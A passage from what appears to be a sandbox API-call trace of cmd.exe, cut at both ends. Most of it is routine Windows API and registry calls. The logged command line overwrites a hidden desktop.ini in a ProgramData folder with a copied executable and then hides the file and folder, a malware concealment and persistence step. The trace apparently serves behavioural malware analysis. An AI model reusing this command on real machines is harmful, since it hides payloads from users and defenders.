lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegCloseKey (hKey=0x40) returned 0x0 [0127.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e734 | out: phkResult=0x18e734*=0x40) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x0, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x9, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x9, lpcbData=0x18e738*=0x4) returned 0x0 [0127.115] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x9, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.115] RegCloseKey (hKey=0x40) returned 0x0 [0127.115] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886361 [0127.115] srand (_Seed=0x5b886361) [0127.115] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" [0127.115] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" [0127.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.115] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371c48, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.115] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.115] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.115] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.115] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.115] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.116] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.116] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.116] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.116] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.116] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.116] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.116] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.116] GetEnvironmentStringsW () returned 0x372638* [0127.116] FreeEnvironmentStringsW (penv=0x372638) returned 1 [0127.116] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.116] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.116] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.116] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.116] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.116] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.116] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.116] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.116] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.116] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.116] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f500 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f500, lpFilePart=0x18f4fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4fc*="Desktop") returned 0x18 [0127.116] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.117] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f27c | out: lpFindFileData=0x18f27c) returned 0x370cc8 [0127.117] FindClose (in: hFindFile=0x370cc8 | out: hFindFile=0x370cc8) returned 1 [0127.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f27c | out: lpFindFileData=0x18f27c) returned 0x370cc8 [0127.117] FindClose (in: hFindFile=0x370cc8 | out: hFindFile=0x370cc8) returned 1 [0127.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f27c | out: lpFindFileData=0x18f27c) returned 0x370cc8 [0127.117] FindClose (in: hFindFile=0x370cc8 | out: hFindFile=0x370cc8) returned 1 [0127.117] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.117] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.117] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.117] GetEnvironmentStringsW () returned 0x3704e8* [0127.118] FreeEnvironmentStringsW (penv=0x3704e8) returned 1 [0127.118] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.118] GetConsoleOutputCP () returned 0x1b5 [0127.118] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.118] GetUserDefaultLCID () returned 0x409 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f640, cchData=128 | out: lpLCData="0") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f640, cchData=128 | out: lpLCData="0") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f640, cchData=128 | out: lpLCData="1") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.119] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.120] GetConsoleTitleW (in: lpConsoleTitle=0x360af8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.121] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.121] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.121] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.121] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.122] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0127.122] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0127.122] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0127.122] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0127.122] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0127.122] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0127.122] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0127.124] _wcsicmp (_String1="del", _String2=")") returned 59 [0127.124] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0127.124] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0127.124] _wcsicmp (_String1="IF", _String2="del") returned 5 [0127.124] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0127.124] _wcsicmp (_String1="REM", _String2="del") returned 14 [0127.125] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0127.127] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.127] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.127] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.127] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.127] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.127] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.127] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.159] SetErrorMode (uMode=0x0) returned 0x0 [0127.159] SetErrorMode (uMode=0x1) returned 0x0 [0127.159] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3704f0, lpFilePart=0x18edf4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18edf4*="Desktop") returned 0x18 [0127.159] SetErrorMode (uMode=0x0) returned 0x1 [0127.159] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.159] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.166] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0xffffffff [0127.166] GetLastError () returned 0x2 [0127.166] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0xffffffff [0127.166] GetLastError () returned 0x2 [0127.166] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0x3725d8 [0127.167] FindClose (in: hFindFile=0x3725d8 | out: hFindFile=0x3725d8) returned 1 [0127.167] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0xffffffff [0127.167] GetLastError () returned 0x2 [0127.167] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0x3725d8 [0127.167] FindClose (in: hFindFile=0x3725d8 | out: hFindFile=0x3725d8) returned 1 [0127.167] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.167] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.167] GetConsoleTitleW (in: lpConsoleTitle=0x18f068, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.167] InitializeProcThreadAttributeList (in: lpAttributeList=0x18eef0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18efb8 | out: lpAttributeList=0x18eef0, lpSize=0x18efb8) returned 1 [0127.167] UpdateProcThreadAttribute (in: lpAttributeList=0x18eef0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18efb0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18eef0, lpPreviousValue=0x0) returned 1 [0127.167] GetStartupInfoW (in: lpStartupInfo=0x18eeac | out: lpStartupInfo=0x18eeac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.168] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.169] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ef4c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef98 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessInformation=0x18ef98*(hProcess=0x50, hThread=0x4c, dwProcessId=0xff4, dwThreadId=0xff8)) returned 1 [0127.175] CloseHandle (hObject=0x4c) returned 1 [0127.175] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.175] GetEnvironmentStringsW () returned 0x370a18* [0127.175] FreeEnvironmentStringsW (penv=0x370a18) returned 1 [0127.175] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0127.219] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18ee8c | out: lpExitCode=0x18ee8c*=0x0) returned 1 [0127.219] CloseHandle (hObject=0x50) returned 1 [0127.219] _vsnwprintf (in: _Buffer=0x18efd4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee98 | out: _Buffer="00000000") returned 8 [0127.219] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.219] GetEnvironmentStringsW () returned 0x372628* [0127.220] FreeEnvironmentStringsW (penv=0x372628) returned 1 [0127.220] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.220] GetEnvironmentStringsW () returned 0x372628* [0127.220] FreeEnvironmentStringsW (penv=0x372628) returned 1 [0127.220] DeleteProcThreadAttributeList (in: lpAttributeList=0x18eef0 | out: lpAttributeList=0x18eef0) [0127.220] GetConsoleTitleW (in: lpConsoleTitle=0x18f270, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e2e8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e2ec, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e2e8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0127.221] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0127.221] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0127.221] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0127.221] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\desktop.ini")) returned 0xffffffff [0127.221] GetLastError () returned 0x2 [0127.221] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1")) returned 0x2010 [0127.221] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0127.221] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0127.221] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\desktop.ini")) returned 0xffffffff [0127.221] GetLastError () returned 0x2 [0127.221] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3736b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3736b4) returned 0xffffffff [0127.221] GetLastError () returned 0x2 [0127.222] _get_osfhandle (_FileHandle=2) returned 0xb [0127.222] GetFileType (hFile=0xb) returned 0x2 [0127.222] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0127.222] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ece8 | out: lpMode=0x18ece8) returned 1 [0127.222] _get_osfhandle (_FileHandle=2) returned 0xb [0127.222] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ed1c | out: lpConsoleScreenBufferInfo=0x18ed1c) returned 1 [0127.222] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0127.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.223] GetFileType (hFile=0x7) returned 0x2 [0127.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.223] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f40c | out: lpMode=0x18f40c) returned 1 [0127.223] _dup (_FileHandle=1) returned 3 [0127.224] _close (_FileHandle=1) returned 0 [0127.224] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini", _String2="con") returned -53 [0127.224] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f3dc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0127.224] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0127.224] GetConsoleTitleW (in: lpConsoleTitle=0x18f20c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.224] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18ed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed70) returned 0x36e6b8 [0127.225] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0127.225] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0127.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0127.225] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dc7c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0127.225] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] GetFileType (hFile=0x58) returned 0x1 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x18dcd4 | out: lpFileSizeHigh=0x18dcd4*=0x0) returned 0x7d600 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.227] GetFileType (hFile=0x50) returned 0x1 [0127.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.227] GetFileType (hFile=0x50) returned 0x1 [0127.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.227] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.228] GetFileType (hFile=0x50) returned 0x1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.228] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.228] GetFileType (hFile=0x50) returned 0x1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] GetFileType (hFile=0x50) returned 0x1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] GetFileType (hFile=0x50) returned 0x1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] GetFileType (hFile=0x50) returned 0x1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.241] GetFileType (hFile=0x50) returned 0x1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.241] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, 